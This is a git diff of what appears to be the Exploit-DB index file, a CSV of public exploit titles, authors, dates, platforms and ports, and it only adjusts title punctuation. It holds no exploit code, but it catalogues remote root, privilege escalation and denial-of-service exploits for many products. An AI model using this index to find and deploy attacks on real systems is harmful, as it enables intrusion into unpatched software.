diff --git a/files.csv b/files.csv index e4d93a687..8f4aa62b4 100755 --- a/files.csv +++ b/files.csv @@ -1,19 +1,19 @@ id,file,description,date,author,platform,type,port 1,platforms/windows/remote/1.c,"Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80 -3,platforms/linux/local/3.c,"Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0 +3,platforms/linux/local/3.c,"Linux Kernel 2.2.x - 2.4.x - ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0 5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 - (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 -9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 +9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x - Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 -15,platforms/osx/local/15.c,"Mac OS X <= 10.2.4 DirectoryService (PATH) Local Root Exploit",2003-04-18,"Neeko Oni",osx,local,0 +15,platforms/osx/local/15.c,"Mac OS X <= 10.2.4 - DirectoryService (PATH) Local Root Exploit",2003-04-18,"Neeko Oni",osx,local,0 16,platforms/linux/remote/16.c,"PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service Exploit",2003-04-22,"Tom Ferris",windows,dos,0 18,platforms/linux/remote/18.sh,"Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 @@ -25,7 +25,7 @@ id,file,description,date,author,platform,type,port 24,platforms/linux/remote/24.c,"Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 25,platforms/linux/remote/25.c,"OpenSSH/PAM <= 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 26,platforms/linux/remote/26.sh,"OpenSSH/PAM <= 3.6.1p1 - Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0 -27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80 +27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution Exploit",2003-05-08,Burebista,windows,remote,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Local Root Exploit",2003-05-12,bob,bsd,local,0 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution Exploit",2003-05-12,N/A,windows,remote,0 @@ -114,7 +114,7 @@ id,file,description,date,author,platform,type,port 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - Remote Denial of Service Exploit (wuftpd-freezer.c)",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135 -118,platforms/bsd/local/118.c,"OpenBSD (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 +118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX <= 3.81 - Stack Overflow Local Root Exploit",2003-11-13,Li0n7,linux,local,0 121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 @@ -129,7 +129,7 @@ id,file,description,date,author,platform,type,port 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - (do_brk) Local Root Exploit (working)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 -134,platforms/hp-ux/local/134.c,"HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 +134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 @@ -171,7 +171,7 @@ id,file,description,date,author,platform,type,port 175,platforms/windows/remote/175.pl,"eMule <= 0.42d IRC Remote Buffer Overflow Exploit",2004-04-12,kingcope,windows,remote,0 176,platforms/windows/dos/176.c,"Microsoft Windows IIS - SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 -178,platforms/linux/local/178.c,"traceroute Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 +178,platforms/linux/local/178.c,"traceroute - Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow Exploit",2000-11-15,vade79,linux,local,0 181,platforms/linux/remote/181.c,"Half Life (rcon) Remote Buffer Overflow Exploit",2000-11-16,"Sao Paulo",linux,remote,27015 @@ -193,13 +193,13 @@ id,file,description,date,author,platform,type,port 200,platforms/bsd/local/200.c,"BSDi suidperl Local Stack Buffer Overflow Exploit",2000-11-21,vade79,bsd,local,0 201,platforms/multiple/remote/201.c,"wu-ftpd 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 -203,platforms/linux/local/203.sh,"vixie-cron Local Root Exploit",2000-11-21,"Michal Zalewski",linux,local,0 +203,platforms/linux/local/203.sh,"vixie-cron - Local Root Exploit",2000-11-21,"Michal Zalewski",linux,local,0 204,platforms/linux/remote/204.c,"BFTPd vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21 205,platforms/linux/local/205.pl,"(redhat 6.2) /usr/bin/rcp suid - Privledge Exploit",2000-11-29,Tlabs,linux,local,0 206,platforms/linux/local/206.c,"dump 0.4b15 Exploit (Redhat 6.2)",2000-11-29,mat,linux,local,0 -207,platforms/bsd/local/207.c,"BSDi 3.0 inc Local Root Buffer Overflow Exploit",2000-11-30,vade79,bsd,local,0 +207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Local Root Buffer Overflow Exploit",2000-11-30,vade79,bsd,local,0 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow Exploit",2000-11-30,"Babcia Padlina",linux,remote,119 -209,platforms/linux/local/209.c,"GLIBC (via /bin/su) Local Root Exploit",2000-11-30,localcore,linux,local,0 +209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Local Root Exploit",2000-11-30,localcore,linux,local,0 210,platforms/solaris/local/210.c,"Solaris locale Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 211,platforms/cgi/webapps/211.c,"PHF - Buffer Overflow Exploit for Linux-x86",2000-12-01,proton,cgi,webapps,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD Remote Buffer Overflow Exploit",2000-12-01,venglin,hp-ux,dos,0 @@ -225,13 +225,13 @@ id,file,description,date,author,platform,type,port 234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 -237,platforms/linux/remote/237.c,"Linux Kernel 2.2 (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513 +237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 -243,platforms/bsd/local/243.c,"BSD chpass (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 +243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 @@ -265,13 +265,13 @@ id,file,description,date,author,platform,type,port 277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53 279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53 280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 -281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit",2001-03-02,"Cody Tubbs",tru64,local,0 +281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - /usr/bin/at Local Root Exploit",2001-03-02,"Cody Tubbs",tru64,local,0 282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (4)",2001-03-02,multiple,linux,remote,53 284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 285,platforms/linux/local/285.c,"Slackware 7.1 /usr/bin/mail Local Exploit",2001-03-03,kengz,linux,local,0 -286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 ports package xklock Local Root Exploit",2001-03-03,dethy,bsd,local,0 -287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 Ports Package elvrec Local Root Exploit",2001-03-03,dethy,bsd,local,0 -288,platforms/multiple/local/288.c,"Progress Database Server 8.3b (prodb) Local Root Exploit",2001-03-04,"the itch",multiple,local,0 +286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Local Root Exploit",2001-03-03,dethy,bsd,local,0 +287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Local Root Exploit",2001-03-03,dethy,bsd,local,0 +288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - (prodb) Local Root Exploit",2001-03-04,"the itch",multiple,local,0 289,platforms/cgi/webapps/289.pl,"sendtemp.pl Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 ld_preload Local Exploit",2001-03-04,Shadow,linux,local,0 291,platforms/linux/remote/291.c,"TCP Connection Reset Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 @@ -301,7 +301,7 @@ id,file,description,date,author,platform,type,port 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0 320,platforms/linux/local/320.pl,"suid_perl 5.001 Vulnerability",1996-06-01,"Jon Lewis",linux,local,0 321,platforms/multiple/local/321.c,"BSD & Linux - umount Local Root Exploit",1996-08-13,bloodmask,multiple,local,0 -322,platforms/linux/local/322.c,"Xt Library Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0 +322,platforms/linux/local/322.c,"Xt Library - Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0 324,platforms/windows/dos/324.txt,"Ping of Death Remote Denial of Service Exploit",1996-10-21,N/A,windows,dos,0 325,platforms/linux/local/325.c,"BSD & Linux - lpr Command Local Root Exploit",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits",1997-03-23,"Cristian Schipor",solaris,local,0 @@ -311,10 +311,10 @@ id,file,description,date,author,platform,type,port 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 /usr/dt/bin/dtterm Local Buffer Overflow Exploit",1997-05-27,"Georgi Guninski",aix,local,0 334,platforms/irix/local/334.c,"IRIX - Multiple Buffer Overflow Exploits (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 -335,platforms/aix/local/335.c,"AIX lquerylv Local Root Buffer Overflow Exploit",1997-05-26,"Georgi Guninski",aix,local,0 +335,platforms/aix/local/335.c,"AIX lquerylv - Local Root Buffer Overflow Exploit",1997-05-26,"Georgi Guninski",aix,local,0 336,platforms/irix/local/336.c,"IRIX /bin/login Local Buffer Overflow Exploit",1997-05-26,"David Hedley",irix,local,0 -337,platforms/irix/local/337.c,"IRIX 5.3 /usr/sbin/iwsh Local Root Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 -338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 xterm (-xrm) Local Root Exploit",1997-05-28,"David Hedley",solaris,local,0 +337,platforms/irix/local/337.c,"IRIX 5.3 - /usr/sbin/iwsh Local Root Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 +338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Local Root Exploit",1997-05-28,"David Hedley",solaris,local,0 339,platforms/linux/local/339.c,"zgv $HOME Overflow",1997-06-20,"BeastMaster V",linux,local,0 340,platforms/linux/remote/340.c,"Linux imapd Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143 341,platforms/solaris/local/341.c,"Solaris 2.4 - passwd & yppasswd & nispasswd Overflow Exploits",1997-07-12,"Cristian Schipor",solaris,local,0 @@ -341,7 +341,7 @@ id,file,description,date,author,platform,type,port 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 -367,platforms/osx/local/367.txt,"Mac OS X Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 +367,platforms/osx/local/367.txt,"Mac OS X - Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0 @@ -349,7 +349,7 @@ id,file,description,date,author,platform,type,port 372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0 -375,platforms/linux/local/375.c,"Linux Kernel File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 +375,platforms/linux/local/375.c,"Linux Kernel - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer Remote Null Pointer Crash (mshtml.dll)",2004-08-04,N/A,windows,dos,0 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,N/A,linux,remote,0 @@ -385,7 +385,7 @@ id,file,description,date,author,platform,type,port 411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0 413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0 -417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0 +417,platforms/linux/local/417.c,"SquirrelMail - (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0 418,platforms/windows/remote/418.c,"Winamp <= 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0 419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win32/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win32,dos,0 @@ -402,7 +402,7 @@ id,file,description,date,author,platform,type,port 431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM _Away_ Message Remote Exploit",2004-09-02,"John Bissell",windows,remote,0 432,platforms/bsd/remote/432.c,"Courier-IMAP <= 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 433,platforms/multiple/dos/433.c,"Call of Duty <= 1.4 - Denial of Service Exploit",2004-09-05,"Luigi Auriemma",multiple,dos,0 -434,platforms/linux/local/434.sh,"CDRDAO Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 +434,platforms/linux/local/434.sh,"CDRDAO - Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 435,platforms/windows/remote/435.c,"Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Remote Privilege Escalation",2004-09-08,mantra,php,webapps,0 437,platforms/linux/remote/437.c,"Citadel/UX <= 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 @@ -463,7 +463,7 @@ id,file,description,date,author,platform,type,port 599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0 -602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0 +602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 - (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0 603,platforms/windows/dos/603.c,"Master of Orion III <= 1.2.5 - Denial of Service Exploit",2004-10-27,"Luigi Auriemma",windows,dos,0 604,platforms/windows/dos/604.c,"Age of Sail II <= 1.04.151 - Remote Buffer Overflow Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 605,platforms/windows/dos/605.c,"Alpha Black Zero <= 1.04 - Remote Denial of Service Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 @@ -532,7 +532,7 @@ id,file,description,date,author,platform,type,port 684,platforms/linux/local/684.c,"TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)",2004-12-14,CoKi,linux,local,0 685,platforms/linux/dos/685.c,"Linux Kernel <= 2.4.28 / <= 2.6.9 - scm_send Local DoS Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 686,platforms/linux/dos/686.c,"Linux Kernel <= 2.6.9 / 2.4.22-28 - (igmp.c) Local Denial of Service Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 -687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS",2004-12-15,dila,windows,dos,0 +687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 - HTTP Daemon /Search Remote DoS",2004-12-15,dila,windows,dos,0 688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit",2004-12-15,x90c,hardware,dos,0 689,platforms/multiple/remote/689.pl,"wget <= 1.9 - Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 690,platforms/linux/dos/690.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 @@ -554,7 +554,7 @@ id,file,description,date,author,platform,type,port 712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow Exploit (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 -715,platforms/solaris/local/715.c,"Solaris 8/9 passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 +715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x - chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 @@ -696,7 +696,7 @@ id,file,description,date,author,platform,type,port 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users Vuln",2005-03-11,Ali7,php,webapps,0 874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 - _3G-A11_ - Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093 -876,platforms/linux/local/876.c,"PaX Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0 +876,platforms/linux/local/876.c,"PaX - Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow Exploit",2005-03-14,"Kevin Finisterre",linux,local,0 878,platforms/linux/remote/878.c,"Ethereal <= 0.10.9 - _3G-A11_ Remote Buffer Overflow Exploit",2005-03-14,"Diego Giagio",linux,remote,0 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 @@ -715,7 +715,7 @@ id,file,description,date,author,platform,type,port 892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit",2005-03-22,sd,linux,local,0 -896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 +896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0 @@ -789,7 +789,7 @@ id,file,description,date,author,platform,type,port 969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (3rd)",2005-04-29,darkeagle,windows,remote,21 970,platforms/linux/remote/970.c,"Snmppd SNMP Proxy Daemon Remote Format String Exploit",2005-04-29,cybertronic,linux,remote,164 971,platforms/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation Exploit",2005-04-29,"Jerome Athias",windows,local,0 -972,platforms/solaris/local/972.c,"Solaris 10.x ESRI Arcgis Local Root Format String Exploit",2005-04-30,"Kevin Finisterre",solaris,local,0 +972,platforms/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Local Root Format String Exploit",2005-04-30,"Kevin Finisterre",solaris,local,0 973,platforms/linux/local/973.c,"ARPUS/Ce Local File Overwrite Exploit (setuid)",2005-05-01,"Kevin Finisterre",linux,local,0 974,platforms/linux/local/974.pl,"ARPUS/Ce Local Overflow Exploit (setuid) (perl)",2005-05-01,"Kevin Finisterre",linux,local,0 975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow Exploit",2005-05-01,muts,windows,remote,21 @@ -798,7 +798,7 @@ id,file,description,date,author,platform,type,port 978,platforms/windows/dos/978.cpp,"Ashley's Web Server Denial of Service Exploit",2005-05-04,basher13,windows,dos,0 979,platforms/windows/remote/979.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit",2005-05-04,Mouse,windows,remote,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce (i-mall.cgi) Remote Command Execution Exploit",2005-05-04,"Jerome Athias",cgi,webapps,0 -981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b Linux Remote Root Format String Exploit",2005-05-05,cybertronic,linux,remote,25 +981,platforms/linux/remote/981.c,"dSMTP Mail 